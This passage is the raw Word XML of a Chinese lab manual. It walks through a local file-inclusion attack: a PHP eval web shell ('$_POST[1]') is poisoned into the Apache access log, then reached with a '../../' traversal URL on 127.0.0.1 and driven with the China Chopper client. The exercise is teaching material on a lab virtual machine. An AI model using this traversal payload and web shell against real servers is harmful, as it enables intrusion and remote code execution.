        <w:t>($_POST[1]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295E972A" wp14:editId="2CD9E3ED">
            <wp:extent cx="5676900" cy="1786119"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="61" name="图片 6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78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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改完毕，点击【Forward】按钮。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>浏览器会提示，如下图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E09C161" wp14:editId="174C8E9E">
            <wp:extent cx="4279316" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="60" name="图片 60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im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316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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5、双击桌面的【实验工具】文件夹，双击打开【中国菜刀】文件夹。找到【中国菜刀.exe】,并双击打开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>空白处右击，选择【添加】。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F07F7D8" wp14:editId="1FBC1F5E">
            <wp:extent cx="4886325" cy="1353387"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="图片 59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im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35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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输入地址http://</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidR="0004411D">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/FI/PHP_FI.php?filename=../../../../../Program Files/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/Apache/logs/access.log，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>地址后的文本框是密码，此处是1，脚本类型选择【PHP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)】，点击【添加】。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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474A1EB" wp14:editId="49749E65">
            <wp:extent cx="4495800" cy="2828925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="58" name="图片 58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im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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结果如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19ED635B" wp14:editId="43096BA8">
            <wp:extent cx="5143500" cy="1323105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="图片 57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imag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32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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>双击上图中的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>蓝框</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>部分即可运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结果如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B73DE73" wp14:editId="0729DA7E">
            <wp:extent cx="5133975" cy="1100138"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="56" name="图片 56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imag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10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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、实验完毕，关闭虚拟机和所有窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F83109" w:rsidRPr="005901CC" w:rsidRDefault="00F83109"/>
    <w:sectPr w:rsidR="00F83109" w:rsidRPr="00590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FB6" w:rsidRDefault="000C5FB6" w:rsidP="005901CC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5FB6" w:rsidRDefault="000C5FB6" w:rsidP="00590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FB6" w:rsidRDefault="000C5FB6" w:rsidP="005901CC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5FB6" w:rsidRDefault="000C5FB6" w:rsidP="005901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E34"/>
    <w:rsid w:val="0004411D"/>
    <w:rsid w:val="000C5FB6"/>
    <w:rsid w:val="001F2E34"/>
    <w:rsid w:val="005901CC"/>
    <w:rsid w:val="00F8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1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0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01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0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01C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901C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901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1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0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01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0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01C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901C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901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154</Words>
  <Characters>881</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>P R C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freeuser</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>freeuser</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-06T03:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-06T03:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>